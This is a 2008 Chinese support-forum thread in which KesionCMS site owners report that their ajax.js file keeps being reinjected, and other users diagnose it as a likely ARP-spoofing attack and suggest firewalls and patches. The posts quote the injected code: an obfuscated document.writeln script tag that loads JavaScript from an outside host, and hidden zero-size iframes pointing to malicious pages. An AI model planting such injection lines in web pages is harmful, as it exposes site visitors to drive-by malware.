账号通
    

账号  

密码  

2512

查看

10

回复
主题:紧急求助:又被嵌入代码了 [收藏主题] 转到:  
天下无语 当前离线

1259

主题

11

广播

1

粉丝
添加关注
级别:九年级

用户积分:9743 分
登录次数:1540 次
注册时间:2007/4/1
最后登录:2024/1/8
天下无语 发表于:2008/5/17 23:05:00   | 只看该作者 查看该作者主题 楼主 
科汛在线考试系统(NET)

今天又被嵌入代码了,我一看ajax.js,里面多了

document.writeln("<script src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/%31%2E%6A%73><\/script>");

删除了再传,一会打开网页又被挂,却找不到是哪个文件被挂的。卡巴拦截的是这个文件地址:http://cc.zuiyige.net/ww/new09.htm

却找不到修改的地方。

 

 

再过一会去看ajax.js文件,又被挂了。官方能有办法解决这个漏洞吗?

我可是打上了最新的补丁的。

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
科汛官方 当前离线

47268

主题

145

广播

405

粉丝
添加关注
级别:管理员

用户积分:101604 分
登录次数:7935 次
注册时间:2006/12/7
最后登录:2023/12/14
科汛官方 发表于:2008/5/18 12:29:00   | 只看该作者 查看该作者主题 沙发 
科汛在线考试系统(NET)

参考:

http://bbs.kesion.com/dispbbs.asp?boardid=41&Id=48882

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
790214 当前离线

1145

主题

1

广播

0

粉丝
添加关注
级别:八年级

用户积分:6575 分
登录次数:616 次
注册时间:2006/5/8
最后登录:2022/7/27
790214 发表于:2008/5/18 10:31:00   | 只看该作者 查看该作者主题 藤椅 
科汛在线商城系统(NET)

根据你这个反应,很大可能性是arp挂马.非常符合arp特性!

 

可以先从服务器着手,装个arp防火墙,

 

你也可以做个实验.把所有科汛的asp文件都暂时删除,然后保留ks_inc文件夹观察,如果还是被挂上,肯定就是服务器安全做得不够

 

暂时解决方案:http://bbs.kesion.com/dispbbs.asp?boardid=41&Id=48878

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
bingguo 当前离线

218

主题

0

广播

0

粉丝
添加关注
级别:二年级

用户积分:2263 分
登录次数:153 次
注册时间:2007/8/10
最后登录:2010/9/14
bingguo 发表于:2008/5/18 10:07:00   | 只看该作者 查看该作者主题 板凳 
做在线知识付费 选科汛云开店

额..是么?

帮你深入看了下```

http:\/\/%61%2E%38%65%39%2E%6E%65%74\/%31%2E%6A%73

这段代码 刚刚通过URL***得到

a.8e9.net\/1.js 这个JS地址

 

继续打开这个JS

发现:

iframe src=http:\/\/www.kiki01.net\/7.htm?ffff width=100 height=0><\/iframe>

以及<iframe src=http:\/\/%61%2E%38%65%39%2E%6E%65%74\/cnzz.htm width=0 height=0><\/iframe>");

 

你网页iframe的两个页面``而且因为 高度 或者宽度 为0 ...很难发现

如果再继续 打开这两个IFRAME的页面....我猜里面可能又会涉及到其他一些页面``

 

想跟你说的是``这个很符合ARP欺骗的象征`应该是说不排除被ARP攻击的原因`最好首先是检查下服务器漏洞...该打的补丁打上.找到恶意代码.删掉.立即打上ARP防火墙``..设置下文件权限``

如果这个还不行的话``.那我就真的无法相信 科讯系统 居然有那么大的注入漏洞?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
天下无语 当前离线

1259

主题

11

广播

1

粉丝
添加关注
级别:九年级

用户积分:9743 分
登录次数:1540 次
注册时间:2007/4/1
最后登录:2024/1/8
天下无语 发表于:2008/5/18 9:43:00   | 只看该作者 查看该作者主题 报纸 
做在线知识付费 选科汛云开店
以下是引用bingguo在2008-5-18 9:24:54的发言:

这个跟科讯 没关系..

是你服务器的问题```

要么是你服务器中毒了``要么就是遭受其他机器攻击``

把代码删掉``然后赶紧找个360的ARP防火墙装上``

可我服务器的其他网站没有中毒,怎么讲?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
bingguo 当前离线

218

主题

0

广播

0

粉丝
添加关注
级别:二年级

用户积分:2263 分
登录次数:153 次
注册时间:2007/8/10
最后登录:2010/9/14
bingguo 发表于:2008/5/18 9:24:00   | 只看该作者 查看该作者主题 地板 
科汛在线考试系统(NET)

这个跟科讯 没关系..

是你服务器的问题```

要么是你服务器中毒了``要么就是遭受其他机器攻击``

把代码删掉``然后赶紧找个360的ARP防火墙装上``

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
天下无语 当前离线

1259

主题

11

广播

1

粉丝
添加关注
级别:九年级

用户积分:9743 分
登录次数:1540 次
注册时间:2007/4/1
最后登录:2024/1/8
天下无语 发表于:2008/5/18 6:59:00   | 只看该作者 查看该作者主题 7楼 
科汛智能建站系统

清除了就又挂,不会超过2分钟,紧急求解决办法。

除了ajax.js外,另外一个不知道是哪个文件,希望官方帮忙解决。。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
bqgz 当前离线

4

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:227 分
登录次数:3 次
注册时间:2008/5/17
最后登录:2008/5/18
bqgz 发表于:2008/5/18 0:17:00   | 只看该作者 查看该作者主题 8楼 
科汛在线商城系统(NET)

很严重啊` 考虑用不用这个了

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
miforum 当前离线

466

主题

0

广播

0

粉丝
添加关注
级别:四年级

用户积分:5808 分
登录次数:456 次
注册时间:2006/12/2
最后登录:2012/11/1
miforum 发表于:2008/5/17 23:20:00   | 只看该作者 查看该作者主题 9楼 
科汛在线考试系统(NET)

我和楼主出现相同的情况,


见另外一个网友发的帖子,和我们类似。我在前天就出现了这种情况啦。


这个网友的帖子:


[注意]漏洞报告:Language.js   


 


里面也有我发的帖子链接,希望能引起官方重视~

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
luntaner 当前离线

183

主题

2

广播

0

粉丝
添加关注
级别:一年级

用户积分:1371 分
登录次数:86 次
注册时间:2007/11/21
最后登录:2018/12/14
luntaner 发表于:2008/5/17 23:19:00   | 只看该作者 查看该作者主题 10楼 
科汛在线商城系统(NET)
竟然有这样的事情??官方给确认一下吧
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.21875秒 powered by KesionCMS 9.0